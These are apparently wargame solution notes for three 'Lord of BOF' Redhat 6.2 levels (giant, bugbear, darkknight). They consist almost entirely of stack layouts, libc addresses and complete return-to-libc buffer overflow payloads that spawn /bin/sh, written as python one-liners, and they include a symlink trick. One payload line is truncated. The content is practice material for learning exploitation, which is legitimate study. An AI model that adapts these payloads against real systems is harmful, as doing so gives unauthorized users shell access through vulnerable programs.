LOB Redhat 6.2 - giant
giant - no stack, no RTL
Stack : buffer[40] + sfp[4] + ret[4]
ret : 0x804851e
system : 0x40058ae0
exit : 0x400391e0
"/bin/sh" : 0x400fbff9
Payload : ./assassin `python -c 'print "A"*44 + "\x1e\x85\x04\x08" + "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40"'`
Using Ret sled + RTL

LOB Redhat 6.2 - bugbear
bugbear - RTL2
stack : *ret[4] + *execve_addr[4] + *execve_offset[4] + *lib_addr[4] + *fp[4] + buffer[40] + sfp[4] + ret[4]
execve : 0x400a9d48
exit : 0x400391e0
execve(filename, *argv[], 0) -> execve("/bin/sh", &"/bin/sh", \x00, &NULL)
Symbolic Link : ln -s giant `python -c 'print "\xf9\xbf\x0f\x40"'` (address of "/bin/sh")
"/bin/sh" : 0x400fbff9
&"/bin/sh", \x00 : 0xbffffff7
&NULL : 0xbffffffc
Payl..

LOB Redhat 6.2 - darkknight
darkknight - RTL1
Stack : i[4] + buffer[40] + sfp[4] + ret[4]
system : 0x40058ae0
exit : 0x400391e0
return address : 0x40058ae0
Payload : ./bugbear `python -c 'print "A"*44 + "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40"'`
binsh.c : Using RTL